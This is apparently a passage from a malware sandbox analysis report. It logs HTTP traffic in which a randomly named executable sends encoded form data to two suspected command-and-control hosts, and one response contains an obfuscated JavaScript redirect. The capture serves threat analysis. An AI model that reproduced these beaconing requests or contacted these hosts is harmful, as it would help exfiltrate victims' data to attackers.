                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.t91rl7.pro
                                                                  Origin: http://www.t91rl7.pro
                                                                  Referer: http://www.t91rl7.pro/jhb8/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 6f 47 59 41 6e 45 4c 46 45 6f 67 30 64 6b 55 2f 76 2f 63 55 42 79 39 4b 77 57 64 2b 57 30 32 45 79 31 57 58 30 53 66 6b 48 5a 76 32 4f 41 57 31 75 2f 78 51 78 56 57 2b 66 76 66 79 2b 75 41 5a 57 33 6b 57 6a 65 72 59 30 4a 30 69 31 42 6d 69 63 74 46 55 58 69 6d 4a 79 31 31 65 59 46 4b 6a 71 78 52 6e 39 35 77 50 74 63 62 59 5a 74 4e 39 68 6b 49 73 6d 50 69 75 49 59 2f 63 65 6a 61 72 76 75 56 68 6c 37 53 32 46 45 4a 53 50 2f 6c 4d 54 51 43 2f 54 30 37 78 30 43 68 30 66 42 53 6c 75 6c 59 7a 75 64 7a 6b 59 78 48 7a 6f 6c 76 33 30 7a 64 48 43 41 3d 3d
                                                                  Data Ascii: BTPDLZX=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/T07x0Ch0fBSlulYzudzkYxHzolv30zdHCA==
                                                                  Dec 4, 2024 12:51:24.516977072 CET364INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:51:24 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 a6 7e 46 6e b9 3e 79 81 a6 be 11 19 d9 be c1 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 5c 38 cf c7 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~Fn>yf.6P\8Z0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.449960154.88.22.101804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:51:25.690303087 CET765OUTPOST /jhb8/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.t91rl7.pro
                                                                  Origin: http://www.t91rl7.pro
                                                                  Referer: http://www.t91rl7.pro/jhb8/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 53 45 72 55 6d 58 31 54 66 6b 4c 35 76 32 47 67 57 77 68 66 78 74 78 56 61 32 66 71 6e 79 2b 75 55 5a 57 31 38 57 6a 74 54 5a 79 4a 30 33 2b 68 6d 67 54 4e 46 55 58 69 6d 4a 79 31 68 6b 59 46 43 6a 71 46 56 6e 39 59 77 41 79 73 62 62 52 4e 4e 39 6c 6b 49 6f 6d 50 6a 39 49 62 37 32 65 6d 57 72 76 72 70 68 72 4b 53 31 4d 45 4a 51 4c 2f 6c 64 57 7a 76 77 4d 58 2f 6c 33 44 46 4e 66 7a 43 48 76 6a 56 70 2f 73 53 7a 4b 78 6a 41 31 69 6d 44 35 77 67 4f 5a 48 37 2f 39 78 47 39 47 48 72 5a 61 48 38 64 50 65 64 69 53 56 51 3d
                                                                  Data Ascii: BTPDLZX=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnSErUmX1TfkL5v2GgWwhfxtxVa2fqny+uUZW18WjtTZyJ03+hmgTNFUXimJy1hkYFCjqFVn9YwAysbbRNN9lkIomPj9Ib72emWrvrphrKS1MEJQL/ldWzvwMX/l3DFNfzCHvjVp/sSzKxjA1imD5wgOZH7/9xG9GHrZaH8dPediSVQ=
                                                                  Dec 4, 2024 12:51:27.188056946 CET364INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:51:26 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 a6 7e 46 6e b9 3e 79 81 a6 be 11 19 d9 be c1 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 5c 38 cf c7 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 67)N.,(ON,VPV/Ji%IAf>~Fn>yf.6P\8Z0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.449967154.88.22.101804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:51:28.364144087 CET10847OUTPOST /jhb8/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.t91rl7.pro
                                                                  Origin: http://www.t91rl7.pro
                                                                  Referer: http://www.t91rl7.pro/jhb8/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 61 45 33 79 36 58 7a 77 33 6b 46 5a 76 32 49 41 57 78 68 66 78 4b 78 56 43 79 66 71 37 49 2b 74 73 5a 58 51 67 57 6c 63 54 5a 68 70 30 33 78 42 6d 6c 63 74 45 4d 58 6a 4c 43 79 31 78 6b 59 46 43 6a 71 45 6c 6e 74 5a 77 41 70 73 62 59 5a 74 4d 79 68 6b 49 55 6d 50 36 49 49 61 50 4d 43 43 71 72 76 50 31 68 70 34 71 31 44 45 4a 57 4f 2f 6b 41 57 7a 69 77 4d 55 61 4c 33 44 78 72 66 78 65 48 75 33 38 65 37 66 69 6e 4c 67 7a 6c 6a 67 32 55 67 42 55 4b 41 55 6e 5a 32 77 65 65 46 6d 6a 6d 41 48 38 58 65 65 52 67 49 43 4b 6d 6f 6c 75 48 45 45 4e 65 66 50 33 2b 4f 6f 73 6d 50 55 57 35 50 67 4c 41 48 5a 65 6c 74 2f 33 71 6a 59 73 6c 32 61 61 43 2f 54 6e 70 7a 71 4f 77 72 4d 4b 44 73 48 65 4c 55 56 2f 55 69 43 56 76 36 4e 56 66 32 35 68 4d 72 2f 58 6f 57 52 4a 76 53 36 50 61 4a 6d 6d 36 61 79 32 68 56 6b 50 47 62 31 35 41 6c 44 74 77 56 51 47 78 31 6b 73 6d 58 2f [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnaE3y6Xzw3kFZv2IAWxhfxKxVCyfq7I+tsZXQgWlcTZhp03xBmlctEMXjLCy1xkYFCjqElntZwApsbYZtMyhkIUmP6IIaPMCCqrvP1hp4q1DEJWO/kAWziwMUaL3DxrfxeHu38e7finLgzljg2UgBUKAUnZ2weeFmjmAH8XeeRgICKmoluHEENefP3+OosmPUW5PgLAHZelt/3qjYsl2aaC/TnpzqOwrMKDsHeLUV/UiCVv6NVf25hMr/XoWRJvS6PaJmm6ay2hVkPGb15AlDtwVQGx1ksmX/6NZ3nB9CUYEOWemj/982OiP/BhvhQSvrhLFZppEEp0wgtKlpibESR6E5bF1tM8xYE4NhlD1g72kJKhVao9SSyX4JQhdkf6PyVFp5qF73Ruj3BhvZYydY6wFN2YtjqQMslZjWt1PMgdvGOUg2oabbonWnK3KjJ5rHAqwx090pPIF2xglGHphlbIxWlH1IQV0fo1bnu1kMXkX2cIAP/AblG69yeebu/jSCnnGJOWxzy56rEPqbqP0PtZyRFzOW43R75DWTrz2Mw2H3s1ey9d0tcaBhqYo4pVKsGVtdaYoAPjWe1xuhOJVfuxtG7MbOjiPXFj2+37cjI+NzayCRx+bYcVpFB0GHRtaWO/y99sO/YcRpgme1Czq8k50xkKlRgoCQef7Mm9K2y0pxt0MggVZK7r3MpXQUdwcJOF3AN1/QGXk7ODXcBPe+EfbaWEqlDbfVw/+cDhjrhpmss47BHob115BQLIFC/DCOOQLMZMwNunZfPw32u3mmv7/LiiIJ4ZU/+vCR7O9qjV6UXlUU13YrbkHjgfpyJ34d4/p+G8D8DdZ8xvU19zaN2yCtgKZLbREQA8Z2cL9Fj4HbuQUF0S8awMfZF959hKUOdNRp0p/PKTPtXUHSOx4xRKelG5D3GauVkSIQg1LFTtQjQPuGjtnXv+PRS6K6SIn0Cd [TRUNCATED]


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.449973154.88.22.101804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:51:31.027718067 CET481OUTGET /jhb8/?BTPDLZX=0R31+Vq/Nm8msnga4XjSJ8sAfUwJuuARFjw5y1poIV3xx1K38BT3Oq7zCSGYp4hHlG+YTfvzleF+eXVetOmv0Pp97wC6ZYoPeW6DxktAXnOuh3ha64INvKA=&WnQdf=JhLPW HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US
                                                                  Host: www.t91rl7.pro
                                                                  Connection: close
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Dec 4, 2024 12:51:32.536885023 CET332INHTTP/1.1 200 OK
                                                                  Server: nginx
                                                                  Date: Wed, 04 Dec 2024 11:51:32 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  Data Raw: 34 65 0d 0a 3c 73 63 72 69 70 74 3e 6c 6f 63 61 74 69 6f 6e 5b 27 68 27 2b 27 72 65 27 2b 27 66 27 5d 20 3d 20 61 74 6f 62 28 27 61 48 52 30 63 48 4d 36 4c 79 38 35 4e 32 46 6d 4c 6e 51 35 4d 58 68 6b 4d 53 35 77 63 6d 38 36 4f 44 6b 78 4d 51 3d 0d 0a 63 0d 0a 3d 27 29 3c 2f 73 63 72 69 70 74 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 4e<script>location['h'+'re'+'f'] = atob('aHR0cHM6Ly85N2FmLnQ5MXhkMS5wcm86ODkxMQ=c=')</script>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.449989209.74.77.107804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:51:38.176188946 CET763OUTPOST /alu5/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.learnwithus.site
                                                                  Origin: http://www.learnwithus.site
                                                                  Referer: http://www.learnwithus.site/alu5/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 204
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 58 4e 6c 6f 47 32 4a 41 4d 4f 41 62 66 2b 45 70 6a 44 62 49 4a 74 6c 70 79 4a 63 56 30 4f 46 46 64 34 45 4c 31 52 36 41 6e 4a 75 61 71 79 78 76 54 30 76 6e 37 50 78 42 4d 37 36 52 30 63 74 71 2b 52 63 39 38 58 56 77 72 47 4c 58 36 6e 72 6e 35 46 48 76 32 66 43 49 4d 4b 72 79 76 49 4a 57 39 4b 4f 59 79 43 6c 34 4a 2f 42 61 67 66 7a 34 45 53 78 6c 79 6a 44 59 45 44 36 77 6e 66 45 56 52 6a 56 42 59 61 6f 50 79 33 35 55 6b 32 4e 66 41 5a 70 42 33 42 7a 49 30 6a 52 71 73 64 4b 35 39 69 76 79 76 69 34 51 6b 39 71 69 6a 30 38 6c 59 54 37 4c 41 41 3d 3d
                                                                  Data Ascii: BTPDLZX=r+fOQXLoIUMlXNloG2JAMOAbf+EpjDbIJtlpyJcV0OFFd4EL1R6AnJuaqyxvT0vn7PxBM76R0ctq+Rc98XVwrGLX6nrn5FHv2fCIMKryvIJW9KOYyCl4J/Bagfz4ESxlyjDYED6wnfEVRjVBYaoPy35Uk2NfAZpB3BzI0jRqsdK59ivyvi4Qk9qij08lYT7LAA==
                                                                  Dec 4, 2024 12:51:39.434420109 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:39 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.449998209.74.77.107804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:51:40.846318960 CET783OUTPOST /alu5/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.learnwithus.site
                                                                  Origin: http://www.learnwithus.site
                                                                  Referer: http://www.learnwithus.site/alu5/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 224
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 57 73 56 6f 45 56 78 41 4f 75 41 63 56 65 45 70 70 6a 62 45 4a 74 70 70 79 49 49 46 30 34 39 46 64 64 67 4c 30 51 36 41 6b 4a 75 61 68 53 77 45 4e 45 76 53 37 50 74 2f 4d 2b 61 52 30 63 35 71 2b 56 51 39 38 41 42 7a 6f 32 4c 56 32 48 72 70 6d 31 48 76 32 66 43 49 4d 4b 58 4d 76 4d 64 57 39 61 2b 59 79 6a 6c 37 41 66 42 5a 71 2f 7a 34 41 53 77 73 79 6a 43 50 45 42 43 4b 6e 63 73 56 52 6d 35 42 59 49 4d 4d 6f 6e 35 6f 67 32 4e 4a 4d 38 55 59 37 42 47 30 72 52 35 32 6d 73 43 49 31 45 69 6f 2b 54 5a 48 32 39 4f 52 2b 7a 31 52 56 51 47 43 62 48 72 74 43 31 7a 4a 58 6f 30 61 6f 6f 46 6f 48 6b 44 4d 42 34 34 3d
                                                                  Data Ascii: BTPDLZX=r+fOQXLoIUMlWsVoEVxAOuAcVeEppjbEJtppyIIF049FddgL0Q6AkJuahSwENEvS7Pt/M+aR0c5q+VQ98ABzo2LV2Hrpm1Hv2fCIMKXMvMdW9a+Yyjl7AfBZq/z4ASwsyjCPEBCKncsVRm5BYIMMon5og2NJM8UY7BG0rR52msCI1Eio+TZH29OR+z1RVQGCbHrtC1zJXo0aooFoHkDMB44=
                                                                  Dec 4, 2024 12:51:42.097157955 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:41 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.450005209.74.77.107804348C:\Program Files (x86)\VGXiTMWYoqNhAAWsIwTYPzVQcfqznyXLRnxMuqxfvvDhJOmUxHgWpLjOhGnJewSO\hLRGQqcplWvpUw.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Dec 4, 2024 12:51:43.514550924 CET10865OUTPOST /alu5/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US
                                                                  Host: www.learnwithus.site
                                                                  Origin: http://www.learnwithus.site
                                                                  Referer: http://www.learnwithus.site/alu5/
                                                                  Cache-Control: no-cache
                                                                  Content-Length: 10304
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                                  Data Raw: 42 54 50 44 4c 5a 58 3d 72 2b 66 4f 51 58 4c 6f 49 55 4d 6c 57 73 56 6f 45 56 78 41 4f 75 41 63 56 65 45 70 70 6a 62 45 4a 74 70 70 79 49 49 46 30 34 31 46 65 75 59 4c 31 79 53 41 6c 4a 75 61 69 53 77 48 4e 45 76 31 37 50 31 6a 4d 2b 57 72 30 66 42 71 78 57 59 39 6f 6c 39 7a 2f 47 4c 56 73 6e 72 6f 35 46 47 33 32 66 53 4d 4d 4b 6e 4d 76 4d 64 57 39 59 6d 59 77 79 6c 37 47 66 42 61 67 66 79 73 45 53 78 4a 79 6a 72 36 45 42 47 67 6b 74 4d 56 52 47 70 42 65 37 6f 4d 6a 6e 35 51 73 57 4d 4b 4d 38 51 39 37 42 62 46 72 55 74 4d 6d 73 47 49 33 31 4c 67 74 53 39 4d 71 39 62 4c 72 45 52 63 54 33 32 33 65 6d 76 69 44 48 53 64 48 35 46 74 6b 49 30 74 43 57 62 4b 65 39 4f 72 70 56 49 2b 71 36 35 75 55 43 76 52 56 76 7a 55 77 43 2f 75 7a 67 61 6e 67 45 32 6e 76 7a 51 78 37 79 55 75 77 55 4e 4b 2f 72 6e 6d 73 37 59 75 31 51 50 70 67 4f 4b 62 55 30 6d 50 74 75 78 38 56 4a 36 44 68 5a 5a 70 54 55 68 48 49 70 67 70 7a 54 54 31 4c 68 38 44 71 51 76 67 56 65 67 67 75 2b 68 41 50 76 74 34 75 61 73 73 50 53 6b 50 4f 76 [TRUNCATED]
                                                                  Data Ascii: BTPDLZX=r+fOQXLoIUMlWsVoEVxAOuAcVeEppjbEJtppyIIF041FeuYL1ySAlJuaiSwHNEv17P1jM+Wr0fBqxWY9ol9z/GLVsnro5FG32fSMMKnMvMdW9YmYwyl7GfBagfysESxJyjr6EBGgktMVRGpBe7oMjn5QsWMKM8Q97BbFrUtMmsGI31LgtS9Mq9bLrERcT323emviDHSdH5FtkI0tCWbKe9OrpVI+q65uUCvRVvzUwC/uzgangE2nvzQx7yUuwUNK/rnms7Yu1QPpgOKbU0mPtux8VJ6DhZZpTUhHIpgpzTT1Lh8DqQvgVeggu+hAPvt4uassPSkPOvs3Ol/gs0W7yQG0yDgyQFibfFHZKK+cgu34BMh53+zRRq9sVEgQva8ILWbnbtaWq5bKddwqBsyt2IjKJZG1+h/GmAe/3pVcQ2BF/pc9rJGO8k3n0lfrr5VM6qmL1B5+iQXUxfPVRp758CqLTyPaav0x8gD0C/ij/8I5FX5QPLfBXAKc4hBU2q9N2dUYMFZxtMQtuktCbIDcoZ82p0PizGu5rrhtiYeWBpeq84CczppvEC/K/mnjl4CBPu9JfPycUSSLgvTP4BMDVI8U75aaIdMg01Ki8P27wRwKJTagmHpolx5Ln3iQzvN9p9HE/CXv7mlqAuGaeACQa/HaUnw4avsGllvw3kaATsV1+WDXu6bMHdzzrJRbe/XgmGZSqzZUhSP3u2I/fla3bgLuyldp+3JK3pdLRC2VIJetRsEfyZvFUygpjbAbgv9tXGK8LQcuxObtqneQ91I9H+0IrhxtRegZtXA7+oR1pJcmYUZuK4dZVJu2hzMqWuBbl7iG2OybGlIZ2IWbZ9BA1urclrbY2rwKwKzIY8uMw99F4w/PcqNOmIuAVEeYcCQeeZz2CanRaVyJvfkxxNjIxONZjKT9pDtZxresalolmiuG/0YnSMRWt8SC+bLJCx66mzzEJJD0GGdb0+Dp76pJeoYA6YWy/Sxy0SXApRariqg2 [TRUNCATED]
                                                                  Dec 4, 2024 12:51:44.806919098 CET533INHTTP/1.1 404 Not Found
                                                                  Date: Wed, 04 Dec 2024 11:51:44 GMT
                                                                  Server: Apache
                                                                  Content-Length: 389
                                                                  Connection: close
                                                                  Content-Type: text/html
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
